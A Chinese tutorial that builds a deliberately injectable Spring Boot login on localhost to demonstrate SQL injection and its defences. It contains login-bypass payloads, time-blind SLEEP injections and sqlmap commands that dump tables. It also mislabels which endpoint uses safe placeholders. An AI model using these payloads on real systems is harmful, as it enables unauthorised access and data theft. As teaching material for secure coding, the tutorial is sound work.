SQL注入是什么?
通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
按照执行效果来分类分为:
1.基于报错注入
2.基于布尔的盲注
3.基于时间的盲注
今天,我们要使用Springboot搭建一个简单的登陆框页面,后端使用JDBC进行数据库数据校验以及复现以上三种常见的SQL注入案例。
测试环境搭建
首先下载IDEA编译器,并且安装JDK环境,然后配置MAVEN仓库。
IDEA官网:https://www.jetbrains.com/
创建MAVEN工程,创建父工程和模块并在模块pom文件中导入依赖(详细教程在链接里有):
org.thymeleaf
thymeleaf
3.0.11.RELEASE
org.thymeleaf
thymeleaf-spring5
3.0.11.RELEASE
org.springframework.boot
spring-boot-starter-thymeleaf
mysql
mysql-connector-java
5.1.32
org.springframework.boot
spring-boot-starter-data-jpa
org.springframework
spring-web
5.1.8.RELEASE
org.springframework
spring-web
5.1.8.RELEASE
org.springframework
spring-web
5.1.8.RELEASE
org.springframework
spring-web
5.1.8.RELEASE
在yml文件中添加数据库配置和thymeleaf:
server:
port: 8000 #端口
spring:
application:
name: service #服务名称
datasource:
driver-class-name: com.mysql.jdbc.Driver
url: jdbc:mysql://localhost:3306/xxxx?useUnicode=true&characterEncoding=utf8
username: root
password: xxxx
thymeleaf:
cache: false
prefix: classpath:/templates/
suffix: .html
encoding: UTF-8
mode: HTML5
添加四种登陆方法
前端页面
这是一个登陆页面
在Controller文件自动装填jdbcTemplate类并添加四种登陆方法:
@Autowired
JdbcTemplate jdbcTemplate;
@RequestMapping("/index")
public String testJumpPage(Model model) throws Exception{
model.addAttribute("result", "开始尝试登陆吧~");
return "index";
}
@PostMapping("/login1")
public String Login1(@RequestParam("username") String username,
@RequestParam("password") String password,
Model model ){
boolean flag=false;
String result="密码错误继续登陆吧";
String sql="";
sql="select count(*) from my_user where user_name='"+username+"'AND user_password='"+password+"'";
List> list = jdbcTemplate.queryForList(sql);
Object f= list.get(0).get("count(*)");
if(f.toString().equals("1")) {
result = "登陆成功";
}
model.addAttribute("result", result);
return "index";
}
@PostMapping("/login2")
public String Login2 (@RequestParam("username") String username,
@RequestParam("password") String password,
Model model ){
boolean flag=false;
String result="密码错误继续登陆吧";
String sql="";
sql="select count(*) from my_user where user_name=? AND user_password=?";
List> list = jdbcTemplate.queryForList(sql,username,password);
Object f= list.get(0).get("count(*)");
if(f.toString().equals("1")) {
result = "登陆成功";
}
model.addAttribute("result", result);
return "index";
}
@PostMapping("/login3")
public String Login3(@RequestParam("username") String username,
@RequestParam("password") String password,
Model model ){
boolean flag=false;
String result="密码错误继续登陆吧";
String sql="";
sql="select count(*) from my_user where user_name='"+username+"'AND user_password='"+password+"'";
try
{
List> list = jdbcTemplate.queryForList(sql);
Object f = list.get(0).get("count(*)");
if (f.toString().equals("1")) {
result = "登陆成功";
}
}catch (Exception e){
System.out.println(e);
}
model.addAttribute("result", result);
return "index";
}
@PostMapping("/login4")
public String Login4 (@RequestParam("username") String username,
@RequestParam("password") String password,
Model model ){
boolean flag=false;
String result="密码错误继续登陆吧";
String sql="";
sql="select count(*) from my_user where user_name='"+username+"'AND user_password='"+password+"'";
try
{
List> list = jdbcTemplate.queryForList(sql);
Object f = list.get(0).get("count(*)");
if (f.toString().equals("1")) {
result = "登陆成功";
}
}catch (Exception e){
System.out.println(e);
model.addAttribute("result", "404无法访问");
return "error404";
}
model.addAttribute("result", result);
return "index";
}
可以看出JDBC有两种Sql语句的拼写方式:
- 使用String相加拼接。
String sql="select count(*) from my_user where user_name='"+username+"'AND user_password='"+password+"'";
List> list = jdbcTemplate.queryForList(sql);
- 使用占位符拼接
String sql="select count(*) from my_user where user_name=? AND user_password=?";
List> list = jdbcTemplate.queryForList(sql,username,password);
注入点手工测试
首先是手工测试一个网页是否符合注入的条件,由于login1方法没有写异常处理,所以页面会自动报异常,把系统内部的错误暴露给用户方。如图:user_name=1'时,带有特殊字符单引号,红字部分程序请求数据库的语句为:
select count(*) from my_user where user_name='1'' AND user_password='';
可以判断user_name是注入点,同理user_password也是注入点。像这个sql,我们就可以在mysql数据库中尝试写sql语句并使用注解机制改变sql语句的结构,使得sql语句变成:
select count(*) from my_user where user_name='' or '1'='1';-- AND user_password ='';
我的mysql数据库只支持'1'='1'这种写法,有的数据库也支持1=1,两种写法
可以直接打开Mysql数据库进行查询不再使用网页端测试,可以得到结果为:表中的总数据量(3条)。
也可以尝试一下做:
select count(*) from my_user where user_name='' OR '1'='1' AND user_password ='';-->0条
select count(*) from my_user where user_name='' AND user_password ='' OR '1'='1';-->3条
通过执行结果我们可以结合文档理解一下AND/OR的用法,AND的优先级是高于OR的,故而查询优化器先计算AND再进行OR计算。
通过程序我们知道count(*)=1时,登陆成功,故而我们可以把username设为想登陆的用户名如:admin,password设为' or '1'='1' and user_name='admin;
拼接成程序执行sql:
select count(*) from my_user where user_name='admin' AND user_password ='' or '1'='1' and user_name='admin';
执行结果=1,可用来登陆已知用户名的"admin"和其他账户。
测试发现,由于login1-3都是String相加拼接,因此存在注入点。login4使用占位符拼接暂时未发现注入点。
并且login1-3三种返回值都会有不一样的回显状态,可以利用这点去暴力拖库,比方说可以执行如:
exists(select 1 from table)
这种语句来判断有没有这张表。
通过编写比较复杂的sql语句,就可以依次判断数据库的库名长度再用穷举法(26个字母)根据返回状态去判断数据库名每一位的字母,从而获得数据库名,同样的方法也能获得表中的数据,这种就是“布尔型盲注”。
相近的道理“时间盲注”在每一个sql中添加sleep()语句可以延缓数据库返回,从而判断执行的成功与否,形成人为判断的true和false值,当然这种方法就比较耗时,同时也比较有攻击性,有可能造成服务不可用。
使用SqlMap进行自动化注入攻击
SqlMap简介
详细介绍:https://blog.csdn.net/taozpwater/article/details/22618995
SqlMap是一个开源渗透测试工具,它可以自动检测和利用SQL注入漏洞并接管数据库服务器的过程。它具有强大的检测引擎,针对最终渗透测试仪的众多细分功能以及从数据库指纹识别,从数据库获取数据到访问基础文件系统以及通过外出在操作系统上执行命令的广泛开关,并带内连接。
运行SqlMap
首先有必要提醒一点,请不要使用渗透测试工具对实际的生产数据库和服务器进行SQL注入攻击,这种行为将触犯《中华人民共和国网络安全法》,严重者会受到法律的制裁。
下面是他的部分使用方法:
帮助信息:python sqlmap.py --help
网页注入点位GET:python sqlmap.py -u url 针对get型传参
网页注入点位POST:python sqlmap.py -r sql.txt 针对post型传参,将request包保存为txt文件,存在注入的参数用*标注;
python sqlmap.py -r sql.txt --dbs 查看有哪几个数据库
python sqlmap.py -r sql.txt -D 库名 --tables 查看数据库内表名
python sqlmap.py -r sql.txt -D 库名 -T 表名 --columns 查看表字段
python sqlmap.py -r sql.txt -D 库名 -T 表名 --dump 下载表
REQUEST包保存的txt文件:
POST /login1 HTTP/1.1
Host: localhost:8000
Connection: keep-alive
Content-Length: 21
Cache-Control: max-age=0
Origin: http://localhost:8000
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,"*/*";q=0.8("*/*"没有双引号)
Referer: http://localhost:8000/login1
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
username=*&password=*
如果有开启数据库慢查询的话就可以到C:\ProgramData\MySQL\MySQL Server 5.6\data中查询慢查询日志了,这是我的部分慢查询日志:
select count(*) from my_user where user_name=''AND user_password='' OR SLEEP(5)-- XuXx';
select count(*) from my_user where user_name='' OR SLEEP(5)-- OVwx'AND user_password='';
这些就是sqlmap在数据库中做时间盲注的部分操作。因此如果在生成数据库慢查询日志中出现大量的sleep函数语句就应该警惕服务器是否被注入攻击了。
总结
在涉及到数据库操作的程序编写时应该避免sql语句使用字符串拼接的方法,目前使用占位符的方法是比较安全的,但是使用占位符进行数据库查询时应该注意JAVA类型和SQL类型的转换问题,否则有可能导致“索引失效”的问题,以下是数据类型转换表:
解决方案有人总结过,这里直接摘抄一下:
永远不要信任用户的输入。对用户的输入进行校验,可以通过正则表达式,或限制长度,对单引号和双"-"进行转换等。
永远不要使用动态拼装SQL,可以使用参数化的SQL(绑定变量)或者直接使用存储过程进行数据查询存取。
永远不要使用管理员权限的数据库连接,为每个应用使用单独的权限有限的数据库连接。
不要把机密信息直接存放,加密或者hash掉密码和敏感的信息。
应用的异常信息应该给出尽可能少的提示,最好使用自定义的错误信息对原始错误信息进行包装。
SQL注入的检测方法一般采取辅助软件或网站平台来检测。
当然如今的SQL注入手段已经远不止上面所描述的三种,基于JPA和Mybatis的数据库操作也并非绝对的安全,作为一个程序员一定要永远处于保存学习的状态、与时俱进才能迎接更多的挑战。
相关链接:
1.Bisal的文章《初学SQL注入》给我的启发:https://mp.weixin.qq.com/s/XMaJ9F5aSsJjNHuSTD49dA
2.WHF关于注入攻击知识的耐心教学,这是她的博客:https://wszdhf.github.io/
3.尚硅谷MySql的网课:https://www.bilibili.com/video/BV12b411K7Zufrom=search&seid=6777170217374891545
4.黑马程序员SpringCloud的网课:https://www.bilibili.com/video/BV1eE41187Ugfrom=search&seid=18019460689454241634